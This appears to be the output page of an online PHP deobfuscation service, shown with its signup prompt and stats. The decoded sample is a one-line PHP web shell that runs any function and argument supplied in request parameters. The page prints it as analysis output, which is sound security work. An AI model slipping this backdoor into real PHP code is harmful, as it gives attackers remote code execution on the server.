Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $_REQUEST['a']($_REQUEST['b']); ?>..
Decoded Output download
<?php
$_REQUEST['a']($_REQUEST['b']);
?>
Did this file decode correctly?
Original Code
<?php
$_REQUEST['a']($_REQUEST['b']);
?>
Function Calls
null | 1 |
Stats
MD5 | 1b208982b4272ac438bd55beca73eb6f |
Eval Count | 0 |
Decode Time | 102 ms |